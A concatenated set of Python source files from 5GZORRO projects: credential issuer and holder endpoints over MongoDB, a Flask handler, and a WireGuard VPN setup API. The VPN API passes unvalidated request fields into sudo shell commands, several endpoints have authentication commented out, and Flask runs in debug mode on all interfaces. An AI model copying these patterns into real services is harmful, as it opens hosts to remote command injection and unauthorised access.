mongo_setup_provider.collection.find_one_and_update({'credential_exchange_id': credential_exchange_id}, {'$set': {"revoked": True}}) # UPDATE REQUEST RECORD FROM MONGO
subscriber = mongo_setup_provider.collection.find_one({"credential_exchange_id": credential_exchange_id})
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update Mongo record")
# SEND REQUEST RECORD TO HOLDER HANDLER
thread = threading.Thread(target = utils.send_to_holder, args=(subscriber["handler_url"],body,), daemon=True)
thread.start()
@router.post("/read_did_status")
async def read_credential_status(response: Response, body: ReadOfferDID):
#if token != id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
body_dict = body.dict()
subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": body_dict["token"]})
if subscriber is not None:
if body_dict["token"] != subscriber["id_token"]:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
else:
return JSONResponse(status_code=status.HTTP_401_UNAUTHORIZED, content="Invalid ID Token")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to verify ID Token")
try:
subscriber = mongo_setup_provider.collection.find_one({"credentialSubject.id": body_dict["did_identifier"]}, {"_id": 0})
if subscriber == None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="DID Credential non existent")
else:
return subscriber
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch requested DID")
@router.get("/read_did")
async def read_specific_credential(response: Response, did_identifier: str): #, token: str, handler_url: Optional[str] = None
#if token != id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#try:
# subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": token})
# if token != subscriber["id_token"]:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#except:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
subscriber = mongo_setup_provider.collection.find_one({"credentialSubject.id": did_identifier, "state": State.did_offer_issue, "revoked" : {"$exists" : False}}, {"_id": 0, "state": 0, "handler_url": 0, "credential_exchange_id": 0})
if subscriber == None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Marketplace Credential not issued or non existent")
else:
return subscriber
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch specific Marketplace Credential")
@router.get("/read_did_catalog")
async def read_all_credentials(response: Response): #, token: str, handler_url: Optional[str] = None
#if token != id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#try:
# subscriber = mongo_setup_provider.stakeholder_col.find_one({"id_token": token})
# if token != subscriber["id_token"]:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
#except:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
subscriber = mongo_setup_provider.collection.find({"state": State.did_offer_issue, "revoked" : { "$exists" : False}}, {"_id": 0, "state": 0, "handler_url": 0, "credential_exchange_id": 0})
result_list = []
for result_object in subscriber:
#print(result_object)
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch Marketplace Credentials")
@router.get("/read_did/revoked")
async def read_revoked_credential():
try:
subscriber = mongo_setup_provider.collection.find({"revoked" : { "$exists" : True}}, {"_id": 0, "state": 0, "handler_url": 0, "credential_exchange_id": 0, "revoked": 0})
result_list = []
for result_object in subscriber:
#print(result_object)
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch revoked Marketplace Credentials")
```
#### File: app/issuer/issuer_did.py
```python
from typing import Optional
from fastapi import APIRouter, Response, status
from fastapi.responses import JSONResponse
import requests, json, os
from loguru import logger
from bson import ObjectId
from app.db import mongo_setup_admin
from app.bootstrap import setup_issuer, setup_vc_schema
#from app.authentication import authentication
# classes
from app.issuer.classes import ReqCred, IssueCred, RevokeCred, State, ResolveOffer
router = APIRouter(
prefix="/issuer",
tags=["issuer"]
)
header = {
'Content-Type': 'application/json'
}
@router.get("/did_offer/pending")
async def read_pending_did_offer_approval(response: Response):
try:
result_list = []
subscriber = mongo_setup_admin.collection.find({"state" : State.did_offer_request, "revoked" : { "$exists" : False}}, {"_id": 0, "service_endpoint": 0})
for result_object in subscriber:
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to read pending DID Offers for approval")
@router.put("/did_offer/resolve", status_code=200)
async def resolve_pending_did_offer_approval(response: Response, body: ResolveOffer):
# Check if pending offer exists
try:
body_dict = body.dict()
subscriber = mongo_setup_admin.collection.find_one({"credentialSubject.id": body_dict["id"], "state" : State.did_offer_request, "revoked" : { "$exists" : False}}, {"_id": 0})
if subscriber is None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Pending Credential Offer not found, or was resolved, or doesn't exist")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to verify existance of pending Credential Offer")
# Resolve credential offer
try:
if body_dict["approval"] is False:
# Reject Credential Offer
mongo_setup_admin.collection.find_one_and_update({"credentialSubject.id": body_dict["id"]}, {'$set': {"state": State.did_offer_decline}}) # UPDATE REQUEST RECORD FROM MONGO
requests.post(subscriber["service_endpoint"]+"/holder/decline_offer_did/"+str(subscriber["holder_request_id"]), timeout=30)
return "Credential Offer was rejected"
else:
# Issue Credential Offer
try:
URL = os.environ["ISSUER_AGENT_URL"]
# Configure Credential to be published
issue_cred = {
"connection_id": subscriber["connection_id"],
"cred_def_id": subscriber["credential_definition_id"],
"credential_proposal": {
"attributes": [
{
"name": "type",
"value": subscriber["type"]
},
{
"name": "credentialSubject",
"value": str(subscriber["credentialSubject"])
},
{
"name": "timestamp",
"value": str(subscriber["timestamp"])
}
]
}
}
final_resp = requests.post(URL+"/issue-credential/send", data=json.dumps(issue_cred), headers=header, timeout=60)
#print(final_resp.text)
cred_info = json.loads(final_resp.text)
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to issue credential on agent")
if cred_info["state"] == "offer_sent":
# SUBSCRIBE TO AGENT RESPONSE
try:
# UPDATE REQUEST RECORD FROM MONGO
mongo_setup_admin.collection.find_one_and_update({"credentialSubject.id": body_dict["id"]}, {'$set': {"state": State.did_offer_issue, "credential_exchange_id": cred_info["credential_exchange_id"]}})
#mongo_setup.collection.remove({"_id": ObjectId(request_id)})
resp_cred = {
"credential_exchange_id": cred_info["credential_exchange_id"],
"credential_definition_id": cred_info["credential_definition_id"],
"credential_offer_dict": cred_info["credential_offer_dict"],
"created_at": cred_info["created_at"],
"updated_at": cred_info["updated_at"],
"schema_id": cred_info["schema_id"],
"state": "credential_acked"
}
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update and subscribe to response")
# NOTIFY HOLDER AGENT
requests.post(subscriber["service_endpoint"]+"/holder/update_did_state/"+str(subscriber["holder_request_id"]), json=resp_cred, timeout=60)
return resp_cred
else:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to subscribe to Credential response")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to connect to Issuer Agent")
@router.post("/request_credential_issue/{request_id}", status_code=201, include_in_schema=False)
async def request_credential_issue(request_id: str, response: Response, body: ReqCred):
# SETUP ISSUER CONNECTION
try:
body_dict = body.dict()
setup_issuer.issuer_connection(body_dict["agent_service_endpoint"])
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to establish Issuer Connection")
# SETUP VC SCHEMA
try:
setup_vc_schema.vc_setup()
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to setup Verifiable Credential Schema")
# CHECK FOR REQUEST RECORD
test = mongo_setup_admin.collection.find_one({"holder_request_id": request_id})
if test != None:
if test["state"] == State.did_offer_issue:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Credential Request was already issued")
# SUBMIT REQUEST TO ADMIN HANDLER
try:
res_to_insert_db = {
"holder_request_id": request_id,
"type": body_dict["type"],
"credentialSubject": {
"id": body_dict["credentialSubject"]["id"],
"claims": body_dict["credentialSubject"]["claims"]
},
"timestamp": body_dict["timestamp"],
"state": State.did_offer_request,
#"handler_url": body_dict["handler_url"]
"service_endpoint": body_dict["service_endpoint"],
"connection_id": setup_issuer.connection_id,
"credential_definition_id": setup_vc_schema.cred_def_id
}
mongo_setup_admin.collection.insert_one(res_to_insert_db)
'''
res_to_admin_handler = {
"_id": str(res_to_insert_db["_id"]),
"holder_request_id": request_id,
"type": body_dict["type"],
"credentialSubject": {
"id": body_dict["credentialSubject"]["id"],
"claims": body_dict["credentialSubject"]["claims"]
},
"timestamp": body_dict["timestamp"],
"service_endpoint": body_dict["service_endpoint"]
}
#print(res_to_admin_handler)
admin_handler_url = os.environ["HANDLER_ADMIN_URL"]
requests.post(admin_handler_url+"/receive", headers=header, json=res_to_admin_handler, timeout=60)
#print(res.json())
return res_to_admin_handler
'''
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to connect to Admin Handler")
'''
@router.post("/issue_requested_credential/{request_id}", status_code=201)
async def issue_requested_credential(request_id: str, response: Response, body: IssueCred): #token: str,
#if token != authentication.id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
# CHECK FOR REQUEST RECORD
try:
test = mongo_setup_admin.collection.find_one({"_id": ObjectId(request_id)})
#print(test)
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Credential Request doesn't exist in Database")
# ISSUE CREDENTIAL
try:
body_dict = body.dict()
URL = os.environ["ISSUER_AGENT_URL"]
# Configure Credential to be published
issue_cred = {
"connection_id": setup_issuer.connection_id,
"cred_def_id": setup_vc_schema.cred_def_id,
"credential_proposal": {
"attributes": [
{
"name": "type",
"value": body_dict["type"]
},
{
"name": "credentialSubject",
"value": str(body_dict["credentialSubject"])
},
{
"name": "timestamp",
"value": str(body_dict["timestamp"])
}
]
}
}
final_resp = requests.post(URL+"/issue-credential/send", data=json.dumps(issue_cred), headers=header, timeout=60)
#print(final_resp.text)
cred_info = json.loads(final_resp.text)
if cred_info["state"] == "offer_sent":
# SUBSCRIBE TO AGENT RESPONSE
try:
# UPDATE REQUEST RECORD FROM MONGO
mongo_setup_admin.collection.find_one_and_update({'_id': ObjectId(request_id)}, {'$set': {"state": "Credential Issued", "credential_definition_id": cred_info["credential_definition_id"], "credential_exchange_id": cred_info["credential_exchange_id"]}})
#mongo_setup.collection.remove({"_id": ObjectId(request_id)})
resp_cred = {
"credential_exchange_id": cred_info["credential_exchange_id"],
"credential_definition_id": cred_info["credential_definition_id"],
"credential_offer_dict": cred_info["credential_offer_dict"],
"created_at": cred_info["created_at"],
"updated_at": cred_info["updated_at"],
"schema_id": cred_info["schema_id"],
"state": "credential_acked"
}
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update and subscribe to response")
# NOTIFY HOLDER AGENT
#try:
holder_url = body_dict["service_endpoint"]
#print(holder_url)
requests.post(holder_url+"/holder/update_did_state/"+str(body_dict["holder_request_id"]), json=resp_cred, timeout=60)
#except:
# return "Unable to notify Holder"
return resp_cred
else:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to subscribe to Credential response")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to connect to Issuer Agent")
'''
@router.get("/read_issued_did")
async def read_issued_did(response: Response, did_identifier: str): #token: str,
#if token != authentication.id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
#URL = os.environ["HOLDER_AGENT_URL"]
#resp = requests.get(URL+"/credential/"+cred_id, timeout=30)
#body = resp.json()
#return body
subscriber = mongo_setup_admin.collection.find_one({"credentialSubject.id": did_identifier, "state": State.did_offer_issue, "revoked" : {"$exists" : False}}, {"_id": 0, "holder_request_id":0, "state": 0, "service_endpoint": 0})
if subscriber == None:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Marketplace Credential revoked or not issued")
else:
return subscriber
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch specific issued Marketplace Credential")
@router.get("/read_issued_did/all")
async def read_all_issued_did(response: Response): #, token: str
#if token != authentication.id_token:
# response.status_code = status.HTTP_401_UNAUTHORIZED
# return "Invalid ID Token"
try:
#URL = os.environ["HOLDER_AGENT_URL"]
#resp = requests.get(URL+"/credentials", timeout=30)
#body = resp.json()
#return body
subscriber = mongo_setup_admin.collection.find({"state": State.did_offer_issue, "revoked" : {"$exists" : False}}, {"_id": 0, "holder_request_id":0, "state": 0, "service_endpoint": 0})
result_list = []
for result_object in subscriber:
#print(result_object)
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch issued Marketplace Credentials")
@router.put("/revoke_did")
async def revoke_credential(response: Response, body: RevokeCred):
# CHECK FOR REQUEST RECORD
try:
body_dict = body.dict()
subscriber = mongo_setup_admin.collection.find_one({"credential_exchange_id": body_dict["cred_exchange_id"]}, {"_id":0})
#return subscriber
if subscriber == None:
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Credential doesn't exist in Database or hasn't been issued yet")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to find Credential to revoke")
# CHECK IF CRED IS ALREADY REVOKED
try:
if "revoked" in subscriber:
return JSONResponse(status_code=status.HTTP_409_CONFLICT, content="Credential already revoked")
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to check if Credential is revoked")
# REVOKE CREDENTIAL
try:
# Configure Credential to be published
revoke_cred = {
"cred_ex_id": subscriber["credential_exchange_id"],
"publish": True
}
URL = os.environ["ISSUER_AGENT_URL"]
final_resp = requests.post(URL+"/revocation/revoke", data=json.dumps(revoke_cred), headers=header, timeout=60)
#revoke_info = json.loads(final_resp.text)
#return revoke_info
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to revoke Credential")
# UPDATE CRED INFO
try:
mongo_setup_admin.collection.find_one_and_update({"credential_exchange_id": subscriber["credential_exchange_id"]}, {'$set': {"revoked": True}})
resp_revoke = {
"credential_exchange_id": subscriber["credential_exchange_id"],
"revoked": True
}
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to update and subscribe to response")
# NOTIFY HOLDER AGENT
holder_url = subscriber["service_endpoint"]
#print(holder_url)
requests.post(holder_url+"/holder/update_revoked_state/"+str(subscriber["credential_exchange_id"]), json=resp_revoke, timeout=60)
return resp_revoke
@router.get("/read_did/revoked")
async def read_revoked_credential():
try:
subscriber = mongo_setup_admin.collection.find({"revoked" : { "$exists" : True}}, {"_id": 0, "holder_request_id":0, "state": 0, "service_endpoint": 0, "revoked": 0})
result_list = []
for result_object in subscriber:
result_list.append(result_object)
return result_list
except Exception as error:
logger.error(error)
return JSONResponse(status_code=status.HTTP_400_BAD_REQUEST, content="Unable to fetch revoked Marketplace Credentials")
```
#### File: src/handler_example/handler.py
```python
import requests, json, os
from flask import Flask, request, jsonify
#from dotenv import load_dotenv
#load_dotenv()
app = Flask(__name__)
admin_controller_url = os.environ["ADMIN_CONTROLLER_URL_DEV"]
########## CREDENTIAL ISSUING ###########
@app.route('/receive', methods=['POST'])
def handler_receiver():
global value
value = request.json
print(value)
return value
@app.route('/accept', methods=['GET'])
def handler_sender():
res_to_admin_agent = {
"holder_request_id": value["holder_request_id"],
"type": value["type"],
"credentialSubject": {
"id": value["credentialSubject"]["id"],
"claims": value["credentialSubject"]["claims"]
},
"timestamp": value["timestamp"],
"service_endpoint": value["service_endpoint"]
}
#print(value["holder_request_id"])
print(res_to_admin_agent)
resp = requests.post(admin_controller_url+"/issuer/issue_requested_credential/"+value["_id"], json=res_to_admin_agent, timeout=60) #+"?token=<PASSWORD>"
body = resp.json()
return body
########## STAKEHOLDER REGISTRATION ###########
@app.route('/stakeholder/receive', methods=['POST'])
def handler_stakeholder_receiver():
global stake_value
stake_value = request.json
print(stake_value)
return stake_value
@app.route('/stakeholder/accept', methods=['GET'])
def handler_stakeholder_sender():
res_stake_admin_agent = {
"holder_request_id": stake_value["holder_request_id"],
"stakeholderClaim": {
"governanceBoardDID": stake_value["stakeholderClaim"]["governanceBoardDID"],
"stakeholderServices": stake_value["stakeholderClaim"]["stakeholderServices"],
#"stakeholderRoles": {
# "role": stake_value["stakeholderClaim"]["stakeholderRoles"]["role"],
# "assets": stake_value["stakeholderClaim"]["stakeholderRoles"]["assets"]
#},
"stakeholderRoles": stake_value["stakeholderClaim"]["stakeholderRoles"],
"stakeholderProfile": {
"name": stake_value["stakeholderClaim"]["stakeholderProfile"]["name"],
"ledgerIdentity": stake_value["stakeholderClaim"]["stakeholderProfile"]["ledgerIdentity"],
"address": stake_value["stakeholderClaim"]["stakeholderProfile"]["address"],
"notificationMethod": stake_value["stakeholderClaim"]["stakeholderProfile"]["notificationMethod"]
},
"stakeholderDID": stake_value["stakeholderClaim"]["stakeholderDID"]
#"did": stake_value["stakeholderClaim"]["did"],
#"verkey": stake_value["stakeholderClaim"]["verkey"]
},
"timestamp": stake_value["timestamp"],
"service_endpoint": stake_value["service_endpoint"]
}
#print(stake_value["holder_request_id"])
print(res_stake_admin_agent)
resp = requests.post(admin_controller_url+"/issuer/issue_stakeholder/"+stake_value["_id"], json=res_stake_admin_agent, timeout=60)
body = resp.json()
return body
#--------------------------------------------------------------------------------------#
if __name__ == "__main__":
app.run(port='4800', host='0.0.0.0', debug='true')
``` |
{
"source": "5GZORRO/inter-secure-channel-setup",
"score": 2
} |
#### File: 5GZORRO/inter-secure-channel-setup/app_api.py
```python
from flask import Flask, request
from flask_restful import Resource, Api
from gevent.pywsgi import WSGIServer
from ipaddress import IPv4Network
import os
import json
import requests
import sys
import subprocess
from gevent import monkey
from dotenv import load_dotenv
monkey.patch_all()
app = Flask(__name__)
api = Api(app)
# Get own public key curve25519
def get_public_key():
file = open("public_key", mode="r")
public_key = file.read()
public_key = public_key[:-1]
file.close()
return public_key
def get_public_key_from_IdM():
#This method will be agnostic to the domains after changing the current end-point of the IdM
public_key = requests.get("http://172.28.3.153:6800/authentication/public_key")
return public_key
def get_own_IP():
command = "ip addr show ens3 | grep \"inet \" | awk \'{print $2}\' | cut -f1 -d\"/\""
result = subprocess.run(command, stdout=subprocess.PIPE, shell=True)
ip = result.stdout.decode('utf-8')
return ip
# Get own private key curve25519
def get_private_key():
file = open("private_key", mode="r")
private_key = file.read()
private_key = private_key[:-1]
file.close()
return private_key
def get_vpn_port():
file = open("vpn_port", mode="r")
vpn_port = int(file.read())
file.close()
return vpn_port
def set_vpn_port(n_port):
file = open("vpn_port", mode="w")
file.write(n_port)
file.close()
# When acting as server, get next IP available for clients in wg0.conf
"""def get_next_IP_available():
min1 = 0
min2 = 0
min3 = 0
min4 = 1
file = open("ip_management", "r")
for line in file:
b = line.split(".")
b1 = int(b[0])
b2 = int(b[1])
b3 = int(b[2])
b4 = int(b[3])
if b1 > min1:
min1 = b1
min2 = 0
min3 = 0
min4 = 1
if b2 > min2:
min2 = b2
min3 = 0
min4 = 1
if b3 > min3:
min3 = b3
min4 = 1
if b4 > min4:
min4 = b4
file.close()
# Case of last IP in range (.255), new subrange. Else, assigned ip is last IP + 1
if min4 == 255:
min3 = min3+1
min4 = 1
else:
min4 = min4+1
ip = str(min1)+"."+str(min2)+"."+str(min3)+"."+str(min4)
# Save assigned IP as in usage
file = open("ip_management", "a")
file.write(ip+"\n")
file.close()
return ip"""
def get_next_IP_available_2():
ip_range = '0.0.0.0/0'
with open("/etc/wireguard/wg0.conf", "r") as confi:
for line in confi:
if "Address =" in line:
ip_range = line.split("= ")[1]
ip_range = ip_range.rstrip()
if ip_range.split("/")[1] == "24":
ip = ip_range.split(".")
ip_range = ip[0]+"."+ip[1]+"."+ip[2]+".0/24"
elif ip_range.split("/")[1] == "16":
ip = ip_range.split(".")
ip_range = ip[0]+"."+ip[1]+".0.0/16"
elif ip_range.split("/")[1] == "8":
ip = ip_range.split(".")
ip_range = ip[0]+"."+"0.0.0/8"
network = IPv4Network(ip_range)
IP_reserved = []
file = open("ip_management", "r")
for line in file:
IP_reserved.append(line.rstrip())
file.close()
first_IP_available = (host for host in network.hosts() if str(host) not in IP_reserved)
assigned_ip = next(first_IP_available)
# Save assigned IP as in usage
file = open("ip_management", "a")
file.write(str(assigned_ip)+"\n")
file.close()
return str(assigned_ip)
def liberate_free_ip(ip_vpn):
file = open("ip_management","r")
line_ip = 0
for num, line in enumerate(file, 1):
if ip_vpn in line:
line_ip = num
os.system("sudo sed -i '"+str(line_ip+1)+"d' ip_management")
# Returns the number, in order, of the gateway to be connected.
# n in added in one per gateway connected to as a client.
def get_n_gateway():
file = open("n_gateway", mode="r")
n_gateway = int(file.read())
file.close()
return n_gateway
def set_n_gateway(n):
file = open("n_gateway", mode="w")
file.write(str(n))
file.close()
# Stores n_gate with the server ip and port to be consulted when deleting
# the connection.
def store_interface_server_association(n_gate, server_ip, server_port):
file = open("interface_server_associations", mode="a")
file.write(str(n_gate) + ":" + str(server_ip) + ":" + str(server_port) + "\n")
file.close()
# Get the n_gate associated with the requested ip and port
def get_interface_server_association(server_ip, server_port):
with open("interface_server_associations", mode="r") as file:
for line in file:
parts = line.split(":")
server_port = str(server_port).split()
parts[2] = parts[2].split()
if server_ip == parts[1] and server_port == parts[2]:
return int(parts[0])
return 999999
class launch(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
ip_range = req["ip_range"]
net_interface = req["net_interface"]
port = req["port"]
# Take environment variable
load_dotenv()
secret = os.getenv('KEY')
# WireGuard installation
os.system("sudo add-apt-repository ppa:wireguard/wireguard")
os.system("sudo apt-get update -y")
os.system("sudo apt-get install -y wireguard-dkms wireguard-tools linux-headers-$(uname -r) openresolv")
# Generate public/private key pairs and store them
#os.system("umask 077")
#os.system("wg genkey | tee private_key | wg pubkey > public_key")
os.system("cat private_key | wg pubkey > public_key")
private_key = get_private_key()
# Generate server configuration
config = open("/etc/wireguard/wg0.conf", "w")
config.write("[Interface]\n")
config.write("Address = " + ip_range + "\n")
config.write("SaveConfig = " + str(False) + "\n")
config.write("ListenPort = " + str(port) + "\n")
config.write("PrivateKey = " + private_key + "\n")
config.write(
"PostUp = " + "iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o " + net_interface + " -j MASQUERADE; ip6tables -A FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -A POSTROUTING -o " + net_interface + " -j MASQUERADE" + "\n")
config.write(
"PostDown = " + "iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o " + net_interface + " -j MASQUERADE; ip6tables -A FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -A POSTROUTING -o " + net_interface + " -j MASQUERADE" + "\n")
config.write("\n\n")
config.close()
os.system("sudo wg-quick up wg0")
os.system("sudo systemctl enable <EMAIL>")
# Store VPN port
set_vpn_port(port)
# Store interface generated
set_n_gateway(0)
file=open("ip_management","w")
file.write(ip_range.split("/")[0]+"\n")
file.close()
# Server rules forwarding
os.system("sudo iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT")
os.system("sudo iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT")
os.system("sudo iptables -A INPUT -p udp -m udp --dport 51820 -m conntrack --ctstate NEW -j ACCEPT")
os.system("sudo iptables -A INPUT -s %s -p tcp -m tcp -m conntrack --ctstate NEW -j ACCEPT" % ip_range)
os.system("sudo iptables -A INPUT -s %s -p udp -m udp -m conntrack --ctstate NEW -j ACCEPT" % ip_range)
os.system("sudo iptables -A FORWARD -i wg0 -o wg0 -m conntrack --ctstate NEW -j ACCEPT")
os.system("sudo iptables -t nat -A POSTROUTING -o %s -j MASQUERADE" % net_interface)
os.system("sudo apt-get install -y iptables-persistent")
os.system("sudo systemctl enable netfilter-persistent")
os.system("sudo netfilter-persistent save")
file = open("/etc/sysctl.conf", "a")
file.write("net.ipv4.ip_forward=1\n")
file.close()
os.system("sudo sysctl -p")
class get_configuration(Resource):
def get(self):
with open("/etc/wireguard/wg0.conf", "r") as confi:
for line in confi:
if "Address =" in line:
ip_range = line.split("= ")[1]
# DID dummy considered, we need to think on the simulated DLT in order to store these information.
data = {
"did": "did:5gzorro:dummy12345",
"public_key": get_public_key(),
"IP_range": ip_range,
"vpn_port":get_vpn_port()
}
return json.dumps(data)
class add_client(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
client_public_key = req["client_public_key"]
#IP_range_to_redirect = req["IP_range_to_redirect"]
assigned_ip = get_next_IP_available_2()
config = open("/etc/wireguard/wg0.conf", "a")
config.write("[Peer]\n")
config.write("PublicKey = " + client_public_key+"\n")
config.write("AllowedIPs = " + assigned_ip + "/32\n")
config.write("\n")
config.close()
server_public_key = get_public_key()
#server_public_key = requests.get("http://172.28.3.153:6200/authentication/public_key")
vpn_port= get_vpn_port()
res = {"assigned_ip": assigned_ip, "vpn_port":vpn_port, "server_public_key": server_public_key}
# See how to evade interface reboot
os.system("sudo wg-quick down wg0 && sudo wg-quick up wg0")
return res
class remove_client(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
client_public_key = req["client_public_key"]
config_line=-100
ip_vpn = ""
with open("/etc/wireguard/wg0.conf","r") as file:
for num, line in enumerate(file, 1):
if client_public_key in line:
config_line = num
if num == config_line+1:
ip_vpn = line.split(" = ")[1]
ip_vpn = ip_vpn.split("/")[0]
if config_line != -100 and ip_vpn != "":
os.system("sudo sed -i '"+str(config_line+1)+"d' /etc/wireguard/wg0.conf")
os.system("sudo sed -i '"+str(config_line)+"d' /etc/wireguard/wg0.conf")
os.system("sudo sed -i '"+str(config_line-1)+"d' /etc/wireguard/wg0.conf")
liberate_free_ip(ip_vpn)
# See how to evade interface reboot
os.system("sudo wg-quick down wg0 && sudo wg-quick up wg0")
return 200
class connect_to_VPN(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
ip_address_server = req["ip_address_server"]
port_server = req["port_server"]
IP_range_to_redirect = req["IP_range_to_redirect"]
client_public_key = get_public_key()
req = {"client_public_key": client_public_key}
headers = {"Content-Type" : "application/json"}
res = requests.post("http://" + str(ip_address_server) + ":" + str(port_server) + "/add_client",
data=json.dumps(req).encode("utf-8"), headers=headers, timeout=10)
res = json.loads(res.text)
assigned_ip = res["assigned_ip"]
server_public_key = res["server_public_key"]
vpn_port = res["vpn_port"]
#n_gate = get_n_gateway()
#n_gate = n_gate + 1
n_gate = 99999
interfaces_reserved = []
try:
with open("interface_server_associations", "r") as file:
for line in file:
interfaces_reserved.append(str(line.split(":")[0]))
for x in range(1,10):
if str(x) not in interfaces_reserved:
n_gate = x
break
except IOError:
n_gate = 1
client_private_key = get_private_key()
config = open("/etc/wireguard/wg" + str(n_gate) + ".conf", "w")
config.write("[Interface]\n")
config.write("Address = " + assigned_ip + "/32\n")
config.write("PrivateKey = " + client_private_key + "\n")
config.write("DNS = 8.8.8.8\n\n")
config.write("[Peer]\n")
config.write("PublicKey = " + server_public_key + "\n")
config.write("Endpoint = " + ip_address_server + ":" + str(vpn_port) + "\n")
config.write("AllowedIPs = "+ IP_range_to_redirect + "\n")
config.write("\n")
config.close()
set_n_gateway(n_gate)
store_interface_server_association(n_gate, ip_address_server, port_server)
os.system("sudo wg-quick up wg" + str(n_gate))
return 200
class disconnect_to_VPN(Resource):
def post(self):
req = request.data.decode("utf-8")
req = json.loads(req)
ip_address_server = req["ip_address_server"]
port_server = req["port_server"]
n_gate = get_interface_server_association(ip_address_server, port_server)
client_public_key = get_public_key()
req = {"client_public_key": client_public_key}
res = requests.post("http://" + str(ip_address_server) + ":" + str(port_server) + '/remove_client',
data=json.dumps(req).encode("utf-8"))
if res.status_code == 200:
os.system("sudo wg-quick down wg" + str(n_gate))
os.system("rm /etc/wireguard/wg" + str(n_gate) + ".conf")
config_line = -100
with open("interface_server_associations","r") as file:
for num, line in enumerate(file,1):
if str(n_gate) in line.split(":")[0]:
config_line = num
if config_line != -100:
os.system("sudo sed -i '"+str(config_line)+"d' interface_server_associations")
return 200
def launch_server_REST(port):
#api.app.run(ssl_context=('cert.pem','key.pem'))
api.add_resource(launch, '/launch')
api.add_resource(get_configuration, '/get_configuration')
api.add_resource(add_client, '/add_client')
api.add_resource(remove_client, '/remove_client')
api.add_resource(connect_to_VPN, '/connect_to_VPN')
api.add_resource(disconnect_to_VPN, '/disconnect_to_VPN')
http_server = WSGIServer(('0.0.0.0', port), app)
http_server.serve_forever()
if __name__ == "__main__":
if len(sys.argv)!=2:
print("Usage: python3 app_api.py [port]")
else:
port=int(sys.argv[1])
launch_server_REST(port)
``` |
{
"source": "5GZORRO/mda",
"score": 2
} |
#### File: mda/app/database.py
```python
from .main import *
